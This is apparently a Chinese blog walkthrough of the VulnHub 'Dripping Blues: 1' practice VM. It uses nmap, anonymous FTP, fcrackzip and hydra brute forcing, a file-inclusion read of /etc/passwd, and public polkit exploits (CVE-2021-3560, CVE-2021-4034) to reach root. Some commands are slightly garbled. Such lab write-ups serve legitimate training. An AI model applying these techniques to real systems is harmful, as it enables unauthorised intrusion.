【渗透测试】Dripping Blues: 1靶场渗透测试

admin 2025年4月24日16:50:53评论1 views字数 3999阅读13分19秒阅读模式
FOCUS ON US
点击蓝字.关注我们
【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试
01
前言
1.1
 下载安装
下载地址:https://www.vulnhub.com/entry/dripping-blues-1,744/

选择镜像文件进行下载。下载后解压是一个ovf文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。

【渗透测试】Dripping Blues: 1靶场渗透测试
1.2
 文件信息
文件名:drippingblues.ova文件大小:2.8 GBMD5:0C024E6396FE1F9D85E980B4630A6ACDSHA1:AC6824EF1A51FBF4D25C68681DEE3EBA827E5B99
1.3
 注意事项

1.4 靶场目标

获取root权限,共有两个flag。

thugger用户-user.txt:5C50FC503A2ABE93B4C5EE3425496521root用户-root.txt:78CE377EF7F10FF0EDCA63DD60EE63B8
03
渗透测试步骤
3.1
 信息收集

确定IP地址、端口扫描、网站访问、目录扫描、FTP连接、ZIP文件爆破密码

3.1.1 确定IP地址

使用nmap确定该靶场IP地址,地址为:192.168.241.174。

namp -sP 192.168.241.0/24
【渗透测试】Dripping Blues: 1靶场渗透测试
3.1.2 端口扫描

使用nmap进行端口扫描,发现其开放21、22和80端口

21端口开放FTP服务,vsftpd 3.0.3,且存在匿名访问,目录下有一个respectmydrip.zip;22端口开放SSH服务,OpenSSH 8.2p1;80端口开放HTTP服务,Apache httpd 2.4.41。

nmap -sV -v -T4 -A -p192.168.241.174
【渗透测试】Dripping Blues: 1靶场渗透测试
3.1.3 网站访问

访问80端口,发现该网站被入侵过,入侵者署名是travisscott和thugger。

http://192.168.241.174
【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试
3.1.4 目录扫描

经过扫描,发现/index.php、/index.php/login、/robots.txt可以访问。

dirsearch -u http://192.168.241.174
【渗透测试】Dripping Blues: 1靶场渗透测试

其index.php页面和index.php/login页面内容相同,均为网站被入侵提示。

【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试

访问robots.txt页面,发现两个目录地址。

【渗透测试】Dripping Blues: 1靶场渗透测试

访问/dirpisreal.txt,给出SSH登录密码。

亲爱的黑客 wannabe订阅关于This Lyrism的评论:https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html数n字,然后把它们并排,然后md5sum即, hellohellohello >> md5sum hellohellohellohellolollo这是ssh的密码。
【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试

将内容下载到kali Linux。

cewl https://www.azlyrics.com/lyrics/youngthug/constantlyhating.htmlcat passwd.txt
【渗透测试】Dripping Blues: 1靶场渗透测试

另一个是:/etc/diripispowerful.html,猜测属于文件包含,但不知道字段参数。

3.1.5 FTP连接
ftp://192.168.241.174
【渗透测试】Dripping Blues: 1靶场渗透测试

下载该文件进行解压,发现需要输入密码。

【渗透测试】Dripping Blues: 1靶场渗透测试

开启临时HTTP服务,将文件导入传入kali Linux。

【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试
3.1.6 ZIP文件爆破密码

经过解压,发现需要输入密码,多次测试后密码均为失败。使用fcrackzip工具暴力破解一下。得到密码为072528035

fcrackzip -D -/usr/share/wordlists/rockyou.txt -u respectmydrip.zip 
【渗透测试】Dripping Blues: 1靶场渗透测试
3.2
 漏洞利用

解压ZIP文件、文件包含、爆破SSH账户、SSH连接、获得第一个flag、查看进程信息。

3.2.1 解压ZIP文件
unzip respectmydrip.zip 密码为07258035
【渗透测试】Dripping Blues: 1靶场渗透测试

查看respectmydirp.txt文件,发现一个提示“dirp”。

secr.zip文件解压还需要输入密码,且刚刚爆破的密码失败。

【渗透测试】Dripping Blues: 1靶场渗透测试

继续爆破secr.zip的解压密码。

fcrackzip -D -/usr/share/wordlists/rockyou.txt -u secret.zip
3.2.2 文件包含

在访问robots.txt页面,发现的目录地址:/etc/dripispowerful.html。

根据解压的文件respectmydrip.txt文件中有drip信息。

尝试使用该进行文件包含访问。

http://192.168.241.174/index.php?drip=/etc/dripispowerful.html
【渗透测试】Dripping Blues: 1靶场渗透测试

成功访问,在源码中发现了密码:imdrippinbiatch。

【渗透测试】Dripping Blues: 1靶场渗透测试

顺便再看看/etc/passwd,发现了用户thugger,且与靶场开机后,页面显示的用户名一致。

【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试

将以上内容保存到user.txt文件。

【渗透测试】Dripping Blues: 1靶场渗透测试

提取用户名信息保存到users.txt文件。

cut -d: -f1 /etc/passwd > users.txt】
【渗透测试】Dripping Blues: 1靶场渗透测试
3.2.3 爆破SSH账户

使用hydra工具爆破SSH登录账户。

得到登录用户名称为:thugger。

(其实,在靶机开机后,登录页面已显示用户名称为thugger)

hydra -L users.txt -p imdrippinbiatch  192.168.241.174 ssh
【渗透测试】Dripping Blues: 1靶场渗透测试
3.2.4 SSH连接

已经获取到用户名thugger,密码imdirppinbiatch,SSH连接。

ssh thugger@192.168.241.174
【渗透测试】Dripping Blues: 1靶场渗透测试
3.2.5 获得第一个flag
user.txt:5C50FC503A2ABE93B4C5EE3425496521
【渗透测试】Dripping Blues: 1靶场渗透测试
3.2.6 查看进程信息

发现poliktd进程。

polkit(原名 PolicyKit)是 Linux 系统中一个非常重要的权限控制组件,主要用于 非特权用户请求执行特权操作时的授权管理。它是现代 Linux 系统(如基于 systemd 的系统)中的一个关键安全机制。使用场景:图形化界面中执行系统设置(如网络配置、挂载磁盘)、控制 systemd 服务启动/停止、操作磁盘工具(如 udisks)、使用 cockpit、GNOME 控制中心 等需要提权操作的系统服务。CVE-2021-4034(PwnKit):影响几乎所有 Linux 发行版
ps -ef
【渗透测试】Dripping Blues: 1靶场渗透测试
3.3
 权限提升1-使用CEV-2021-3560.py

下载exp文件、提权、获得第二个flag。

3.3.1 下载EXP文件

在github找到相关漏洞利用代码,下载到本机。

https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

开启临时http服务,在靶机中下载此文件。

【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试
3.3.2 提权

执行该文件,即可获得root权限。

python3 CVE-2021-3560.py
【渗透测试】Dripping Blues: 1靶场渗透测试

以获取root权限。

【渗透测试】Dripping Blues: 1靶场渗透测试
3.3.3 获得第二个flag

经过查阅,在root用户目录下,发现root.txt

root.txt:78CE377EF7F10FF0EDCA63DD60EE63B8
【渗透测试】Dripping Blues: 1靶场渗透测试
3.4
 权限提升2-使用CVE-2021-4034.py

也可以使用此代码进行提权。

https://github.com/berdav/CVE-2021-4034

本机下载该文件,开启临时http服务,传入靶机。

【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试

解压CVE-2021-4034.zip

unzip CVE-2021-4034.zip
【渗透测试】Dripping Blues: 1靶场渗透测试

失败了,因靶机汇总未有make和gcc无法执行,只能使用python执行。

【渗透测试】Dripping Blues: 1靶场渗透测试

在github搜索后,发现python代码的CVE-2021-4034。

https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py

下载导入靶机。

【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试

在靶机中运行该代码,即可获得root权限。

python3 CVE-2021-4034.py
【渗透测试】Dripping Blues: 1靶场渗透测试
【渗透测试】Dripping Blues: 1靶场渗透测试
(
END
)

免责声明

本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!

以下为本公众号声明内容,请知悉并遵守:

1.关于信息的准确性

本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。

2.法律与合规性

使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。

3.版权声明

本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。

4.合法用途限制

本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。

5.风险告知

因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。

【渗透测试】Dripping Blues: 1靶场渗透测试
FINANCE
扫码联系

暗魂攻防实验室

官方客服

往期推荐:

【渗透测试】Corrosion: 2靶场渗透测试

【渗透测试】Noob: 1靶场渗透测试

配置不当导致某程序成为服务器“后门”?你的数据可能已暴露

【渗透测试】ICA: 1靶场渗透测试

【渗透测试】Dripping Blues: 1靶场渗透测试

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Dripping Blues: 1靶场渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月24日16:50:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】Dripping Blues: 1靶场渗透测试https://cn-sec.com/archives/3994495.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息